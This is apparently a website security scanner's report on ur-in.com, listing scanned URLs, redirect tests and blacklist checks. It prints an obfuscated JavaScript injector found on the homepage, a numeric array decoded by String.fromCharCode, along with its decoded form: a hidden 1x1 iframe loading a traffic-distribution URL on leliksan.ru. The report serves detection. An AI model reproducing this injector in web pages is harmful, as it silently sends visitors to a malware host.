Scanned pages/files
Request | Server response | Status |
http://www.ur-in.com/ | 200 OK Content-Length: 10810 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
a=new Array(59.64,114.95,98.93,113.79,104.85,111.86,115.66,61.92,99.7,110.66,98.91,116.82,108.69,100.68,109.85,115.74,45.68,118.65,113.68,104.71,115.79,100.93,39.78,82.97,115.89,113.83,104.94,109.76,102.67,45.71,101.76,113.71,110.81,108.7,66.81,103.86,96.61,113.73,66.68,110.66,99.76,100.95,39.97,53.93,47.93,43.88,48.86,48.72,52.63,43.68,56.93,56.86,43.73,48.67,48.78,51.79,43.72,48.6,47.98,52.94,43.69,48.79,48.74,49.76,43.93,48.6,48.64,53.69,43.73,53.75,49.66,43.95,50.77,49.99,43.99,48.79,48.73,5
for (i=0;i<=a.length; i++){document.write(String.fromCharCode(Math.round(a[i])));};
Decoded script:
var Str="99' width=1 height=1 style='visibility: hidden'></iframe> <iframe src='http://leliksan.ru/tds/index.php?out=12142283"
document.write(Str.substring(58,117),Str.substring(0,58))
Antivirus reports:
http://www.ur-in.com/gallery2/ | 404 Not Found Content-Length: 653 Content-Type: text/html | clean |
http://cdn.dsultra.com/js/registrar.js | 200 OK Content-Length: 1652 Content-Type: application/x-javascript | clean |
http://www.ur-in.com/test404page.js | 404 Not Found Content-Length: 653 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ur-in.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ur-in.com
Referer: http://www.google.com/search?q=ur-in.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ur-in.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ur-in.com/
Result: ur-in.com is not infected or malware details are not published yet.